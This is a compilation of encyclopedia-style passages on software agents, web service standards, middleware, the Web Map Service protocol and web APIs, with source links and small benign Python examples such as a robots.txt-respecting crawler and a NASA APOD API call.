The concept of an agent can be traced back to Hewitt's actor model (Hewitt, 1977): "A self-contained, interactive and concurrently-executing object, possessing internal state and communication capability."[citation needed] More formally, software agent systems are a direct evolution of multi-agent systems (MAS). MAS evolved from Distributed Artificial Intelligence (DAI), Distributed Problem Solving (DPS) and Parallel AI (PAI), thus inheriting all characteristics (good and bad) from DAI and AI. John Sculley's 1987 "Knowledge Navigator" video portrayed an image of a relationship between end users and agents. Initially an ideal, the field experienced a series of unsuccessful top-down implementations, rather than a piece-by-piece, bottom-up approach. The range of agent types has been broad since 1990: WWW agents, search engines, etc.

Buyer agents[9] travel around a network (e.g. the Internet) retrieving information about goods and services. These agents, also known as 'shopping bots', work very efficiently for commodity products such as CDs, books, electronic components, and other one-size-fits-all products. Buyer agents are typically optimized to allow for the digital payment services used in e-commerce and traditional businesses.[10] User agents, or personal agents, are intelligent agents that take action on your behalf; in this category belong those intelligent agents that already perform, or will shortly perform, a range of tasks for the user.

Monitoring and surveillance agents are used to observe and report on equipment, usually computer systems. The agents may keep track of company inventory levels, observe competitors' prices and relay them back to the company, watch stock manipulation by insider trading and rumors, etc. For example, NASA's Jet Propulsion Laboratory has an agent that monitors inventory and planning, schedules equipment orders to keep costs down, and manages food storage facilities. These agents usually monitor complex computer networks and can keep track of the configuration of each computer connected to the network. A special case of monitoring-and-surveillance agents are organizations of agents used to emulate the human decision-making process during tactical operations. The agents monitor the status of assets (ammunition, weapons available, platforms for transport, etc.) and receive goals (missions) from higher-level agents. The agents then pursue the goals with the assets at hand, minimizing expenditure of the assets while maximizing goal attainment. (See Popplewell, "Agents and Applicability".)

A data mining agent uses information technology to find trends and patterns in an abundance of information from many different sources. The user can sort through this information in order to find whatever they are seeking. A data mining agent operates in a data warehouse, discovering information. A 'data warehouse' brings together information from many different sources.
"Data mining" is the process of looking through the data warehouse to find information that you can use to take action, such as ways to increase sales or keep customers who are considering defecting. 'Classification' is one of the most common types of data mining, which finds patterns in information and categorizes them into different classes. Data mining agents can also detect major shifts in trends or a key indicator and can detect the presence of new information and alert you to it. For example, the agent may detect a decline in the construction industry for an economy; based on this relayed information construction companies will be able to make intelligent decisions regarding the hiring/firing of employees or the purchase/lease of equipment in order to best suit their firm. Some other examples of currentintelligent agentsinclude somespamfilters, gamebots, and server monitoring tools.Search engine indexingbots also qualify as intelligent agents. Software bots are becoming important in software engineering.[12] Agents are also used in software security application to intercept, examine and act on various types of content. Example include: Issues to consider in the development of agent-based systems include For software agents to work together efficiently they must sharesemanticsof their data elements. This can be done by having computer systems publish theirmetadata. The definition ofagent processingcan be approached from two interrelated directions: Agent systems are used to model real-world systems withconcurrencyor parallel processing. The agent uses its access methods to go out into local and remote databases to forage for content. These access methods may include setting up news stream delivery to the agent, or retrieval from bulletin boards, or using a spider to walk the Web. The content that is retrieved in this way is probably already partially filtered – by the selection of the newsfeed or the databases that are searched. The agent next may use its detailed searching or language-processing machinery to extract keywords or signatures from the body of the content that has been received or retrieved. This abstracted content (or event) is then passed to the agent's Reasoning or inferencing machinery in order to decide what to do with the new content. This process combines the event content with the rule-based or knowledge content provided by the user. If this process finds a good hit or match in the new content, the agent may use another piece of its machinery to do a more detailed search on the content. Finally, the agent may decide to take an action based on the new content; for example, to notify the user that an important event has occurred. This action is verified by a security function and then given the authority of the user. The agent makes use of a user-access method to deliver that message to the user. If the user confirms that the event is important by acting quickly on the notification, the agent may also employ its learning machinery to increase its weighting for this kind of event. Bots can act on behalf of their creators to do good as well as bad. There are a few ways which bots can be created to demonstrate that they are designed with the best intention and are not built to do harm. This is first done by having a bot identify itself in the user-agent HTTP header when communicating with a site. The source IP address must also be validated to establish itself as legitimate. 
Next, the bot must always respect a site's robots.txt file, since it has become the standard across most of the web. Finally, as with respecting the robots.txt file, bots should shy away from being too aggressive and should respect any crawl-delay instructions.[14]
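A minimal sketch of these conventions in Python, using only the standard library; the bot name, User-Agent string, and example.com URLs are hypothetical placeholders.

```python
import time
from urllib.request import Request, urlopen
from urllib.robotparser import RobotFileParser

# Identify the bot honestly in the User-Agent header (hypothetical name).
USER_AGENT = "ExampleBot/1.0 (+https://example.com/bot-info)"

# Parse the site's robots.txt before fetching anything.
robots = RobotFileParser()
robots.set_url("https://example.com/robots.txt")
robots.read()

def polite_fetch(url):
    """Fetch url only if robots.txt allows it, honoring any crawl delay."""
    if not robots.can_fetch(USER_AGENT, url):
        return None  # disallowed by robots.txt; a good bot backs off
    delay = robots.crawl_delay(USER_AGENT)
    if delay:
        time.sleep(delay)  # respect the site's requested pacing
    request = Request(url, headers={"User-Agent": USER_AGENT})
    with urlopen(request) as response:
        return response.read()

print(polite_fetch("https://example.com/index.html"))
```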
https://en.wikipedia.org/wiki/Software_agent
A list of web service frameworks:
https://en.wikipedia.org/wiki/List_of_web_service_frameworks
The following is a list of web service protocols.
https://en.wikipedia.org/wiki/List_of_web_service_protocols
There are a variety of specifications associated with web services. These specifications are in varying degrees of maturity and are maintained or supported by various standards bodies and entities. The basic web services framework is established by the first-generation standards WSDL, SOAP, and UDDI.[1] Specifications may complement, overlap, and compete with each other. Web service specifications are occasionally referred to collectively as "WS-*", though there is no single managed set of specifications that this consistently refers to, nor a recognized body that owns them all. These sites contain documents and links about the different web services standards identified on this page. Some specifications provide additional information to improve interoperability between vendor implementations.
https://en.wikipedia.org/wiki/List_of_web_service_specifications
Middleware is a type of computer software that provides services to software applications beyond those available from the operating system. It can be described as "software glue".[1][2] Middleware makes it easier for software developers to implement communication and input/output, so they can focus on the specific purpose of their application. It gained popularity in the 1980s as a solution to the problem of how to link newer applications to older legacy systems, although the term had been in use since 1968.[3]

The term is most commonly used for software that enables communication and management of data in distributed applications. An IETF workshop in 2000 defined middleware as "those services found above the transport (i.e. over TCP/IP) layer set of services but below the application environment" (i.e. below application-level APIs).[citation needed] In this more specific sense, middleware can be described as the hyphen ("-") in client-server, or the -to- in peer-to-peer. Middleware includes web servers, application servers, content management systems, and similar tools that support application development and delivery.[4] ObjectWeb defines middleware as "the software layer that lies between the operating system and applications on each side of a distributed computing system in a network".[5] Services that can be regarded as middleware include enterprise application integration, data integration, message-oriented middleware (MOM), object request brokers (ORBs), and the enterprise service bus (ESB).[6]

Database access services are often characterised as middleware. Some of them are language-specific implementations and support heterogeneous features and other related communication features.[7] Examples of database-oriented middleware include ODBC, JDBC, and transaction processing monitors.[8] Distributed computing system middleware can loosely be divided into two categories: those that provide human-time services (such as web request servicing) and those that perform in machine-time. The latter middleware is somewhat standardized through the Service Availability Forum[9] and is commonly used in complex, embedded systems within the telecom, defence, and aerospace industries.[10] Many categories of middleware have been defined, based on the field in which the middleware is used or the application module it serves; a recent bibliography identifies the main categories.[11]

The term middleware is used in other contexts as well; it is sometimes used in a sense similar to a software driver, an abstraction layer that hides detail about hardware devices or other software from an application.
https://en.wikipedia.org/wiki/Middleware
A Web Map Service (WMS) is a standard protocol developed by the Open Geospatial Consortium in 1999 for serving georeferenced map images over the Internet.[1] These images are typically produced by a map server from data provided by a GIS database.[3]

The Open Geospatial Consortium (OGC) became involved in developing standards for web mapping after a paper was published in 1997 by Allan Doyle outlining a "WWW Mapping Framework".[4] The OGC established a task force to come up with a strategy,[5] and organized the "Web Mapping Testbed" initiative, inviting pilot web mapping projects that built upon ideas by Doyle and the OGC task force. Results of the pilot projects were demonstrated in September 1999, and a second phase of pilot projects ended in April 2000.[6] The Open Geospatial Consortium released WMS version 1.0.0 in April 2000,[7] followed by version 1.1.0 in June 2001,[8] and version 1.1.1 in January 2002.[9] The OGC released WMS version 1.3.0 in January 2004.[10]

WMS specifies a number of different request types, two of which (GetCapabilities and GetMap) are required by any WMS server;[11] additional request types, such as GetFeatureInfo, may optionally be supported. All communication is served through HTTP. A WMS server usually serves the map in a bitmap format, e.g. PNG, GIF, or JPEG. In addition, vector graphics can be included, such as points, lines, curves and text, expressed in SVG or WebCGM format.

Both open-source and proprietary server software can provide web map service capability, and both open-source and proprietary standalone (client-side) software can view web map services. WMS is a widely supported format for maps and GIS data accessed via the Internet and loaded into client-side GIS software; it is supported by major commercial and open-source GIS and mapping software.
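Because all communication goes over HTTP, a GetMap request is just a URL whose query string names the requested layers, coordinate reference system, bounding box, image size, and format. The sketch below builds such a URL in Python; the server address and layer name are hypothetical placeholders, not a real service.

```python
from urllib.parse import urlencode

# Parameters of a WMS 1.3.0 GetMap request; the server URL and the
# layer name are invented for illustration.
params = {
    "SERVICE": "WMS",
    "VERSION": "1.3.0",
    "REQUEST": "GetMap",
    "LAYERS": "topography",            # illustrative layer name
    "STYLES": "",
    "CRS": "EPSG:4326",                # coordinate reference system
    "BBOX": "40.0,-75.0,41.0,-74.0",   # lat/lon axis order in WMS 1.3.0
    "WIDTH": "512",
    "HEIGHT": "512",
    "FORMAT": "image/png",             # server renders the map as a bitmap
}

url = "https://example.com/wms?" + urlencode(params)
print(url)  # fetching this URL would return the rendered PNG image
```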
https://en.wikipedia.org/wiki/Web_Map_Service
A web API is an application programming interface (API) for either a web server or a web browser. As a web development concept, it can be related to a web application's client side (including any web frameworks being used). A server-side web API consists of one or more publicly exposed endpoints to a defined request–response message system, typically expressed in JSON or XML by means of an HTTP-based web server. A server API (SAPI) is not considered a server-side web API unless it is publicly accessible by a remote web application.

A client-side web API is a programmatic interface for extending functionality within a web browser or other HTTP client. Originally these were most commonly in the form of native plug-in browser extensions; however, most newer ones target standardized JavaScript bindings. The Mozilla Foundation created its WebAPI specification, which is designed to help replace native mobile applications with HTML5 applications.[1][2] Google created its Native Client architecture, which is designed to help replace insecure native plug-ins with secure, native, sandboxed extensions and applications; it has also been made portable by employing a modified LLVM AOT compiler.

Mashups are web applications that combine the use of multiple server-side web APIs.[3][4][5] Webhooks are server-side web APIs that take as input a Uniform Resource Identifier (URI) designed to be used like a remote named pipe or a type of callback: the server acts as a client to dereference the provided URI and trigger an event on another server, which handles the event, thus providing a type of peer-to-peer IPC.

Endpoints are important aspects of interacting with server-side web APIs, as they specify where the resources accessible to third-party software lie. Usually the access is via a URI to which HTTP requests are posted, and from which the response is thus expected. Web APIs may be public or private; the latter requires an access token.[6] Endpoints need to be static, otherwise the correct functioning of software that interacts with them cannot be guaranteed. If the location of a resource changes (and with it the endpoint), then previously written software will break, as the required resource can no longer be found at the same place. As API providers still want to update their web APIs, many have introduced a versioning system in the URI that points to an endpoint.

Web 2.0 web APIs often use machine-based interactions such as REST and SOAP. RESTful web APIs use HTTP methods to access resources via URL-encoded parameters, and use JSON or XML to transmit data. By contrast, SOAP protocols are standardized by the W3C and mandate the use of XML as the payload format, typically over HTTP. Furthermore, SOAP-based web APIs use XML validation to ensure structural message integrity, by leveraging the XML schemas provisioned with WSDL documents. A WSDL document accurately defines the XML messages and transport bindings of a web service.

Server-side web APIs are interfaces through which the outside world interacts with the business logic. For many companies, this internal business logic and the intellectual property associated with it are what distinguish them from other companies, and potentially what give them a competitive edge. They do not want this information to be exposed.
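To make the idea of a publicly exposed, versioned endpoint concrete, here is a minimal sketch using Python's standard library. The path /api/v1/status and the JSON payload are invented for illustration; a production service would use a proper web framework rather than http.server.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# Minimal sketch of a server-side web API with one public endpoint.
# The endpoint path (note the version segment) and payload are illustrative.
class ApiHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.split("?")[0] == "/api/v1/status":
            body = json.dumps({"status": "ok", "version": 1}).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)   # the JSON response message
        else:
            self.send_error(404)     # unknown endpoint

if __name__ == "__main__":
    HTTPServer(("localhost", 8000), ApiHandler).serve_forever()
```

A client would then issue a GET request to http://localhost:8000/api/v1/status and receive the JSON response; bumping the version segment to /api/v2/ would let the provider change the payload without breaking existing clients.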
However, in order to provide a web API of high quality, there needs to be a sufficient level of documentation. One API provider that not only provides documentation but also links to it in its error messages is Twilio.[7] There are now directories of popular documented server-side web APIs.[8]

The number of available web APIs has grown consistently over the past years, as businesses realize the growth opportunities associated with running an open platform that any developer can interact with. ProgrammableWeb tracked over 24,000 web APIs available in 2022, up from 105 in 2005. Web APIs have become ubiquitous; there are few major software applications or services that do not offer some form of web API. One of the most common forms of interacting with these web APIs is via embedded external resources, such as tweets, Facebook comments, and YouTube videos. In fact, there are very successful companies, such as Disqus, whose main service is to provide embeddable tools, for example a feature-rich comment system.[9] Every one of the top 100 websites as ranked by Alexa Internet uses APIs and/or provides its own, a distinct indicator of the prodigious scale and impact of web APIs as a whole.[10] As the number of available web APIs has grown, open-source tools have been developed to provide more sophisticated search and discovery. APIs.json provides a machine-readable description of an API and its operations, and the related project APIs.io offers a searchable public listing of APIs based on the APIs.json metadata format.[11][12]

Many companies and organizations rely heavily on their web API infrastructure to serve their core business clients. In 2014, Netflix received around 5 billion API requests, most of them within its private API.[13] Many governments collect a lot of data, and some are now opening up access to it. The interfaces through which this data is typically made accessible are web APIs. Web APIs allow data such as "budget, public works, crime, legal, and other agency data"[14] to be accessed by any developer in a convenient manner.

An example of a popular web API is the Astronomy Picture of the Day API operated by the American space agency NASA. It is a server-side API used to retrieve photographs of space or other images of interest to astronomers, and metadata about the images. According to the API documentation,[15] the API has a single endpoint, https://api.nasa.gov/planetary/apod. The documentation states that this endpoint accepts GET requests. It requires one piece of information from the user, an API key, and accepts several other optional pieces of information. Such pieces of information are known as parameters. The parameters for this API are written in a format known as a query string, which is separated from the endpoint by a question mark character (?). An ampersand (&) separates the parameters in the query string from each other. Together, the endpoint and the query string form a URL that determines how the API will respond. This URL is also known as a query or an API call. In the example discussed below, two parameters are transmitted (or passed) to the API via the query string. The first is the required API key and the second is an optional parameter, the date of the photograph requested. Visiting such a URL in a web browser will initiate a GET request, calling the API and showing the user a result, known as a return value or simply a return. This API returns JSON, a type of data format intended to be understood by computers, but which is fairly easy for a human to read as well.
In this case, the JSON contains information about a photograph of a white dwarf star. The API return is typically reformatted so that the names of the JSON data items, known as keys, appear at the start of each line. The last of these keys, named url, indicates a URL that points to the photograph itself; following that URL, a web browser user would see the photo. Although this API can be called by an end user with a web browser (as in this example), it is intended to be called automatically by software or by computer programmers while writing software. The JSON is intended to be parsed by a computer program, which would extract the URL of the photograph and the other metadata. The resulting photo could be embedded in a website, automatically sent via text message, or used for any other purpose envisioned by a software developer.
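A sketch of such a programmatic call in Python, using only the standard library. It passes the documented api_key and date parameters in the query string; DEMO_KEY is NASA's published sample key, and the date chosen here is arbitrary, so the keys extracted below are whatever that day's entry contains rather than the white dwarf photograph discussed above.

```python
import json
from urllib.parse import urlencode
from urllib.request import urlopen

# Build the query string from the required api_key and the optional
# date parameter, then call the Astronomy Picture of the Day endpoint.
params = {"api_key": "DEMO_KEY", "date": "2020-01-01"}
url = "https://api.nasa.gov/planetary/apod?" + urlencode(params)

with urlopen(url) as response:   # issue the GET request (the API call)
    apod = json.load(response)   # parse the JSON return value

# Extract the metadata a program would typically use.
print(apod["title"])
print(apod["url"])               # the 'url' key points to the image itself
```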
https://en.wikipedia.org/wiki/Web_API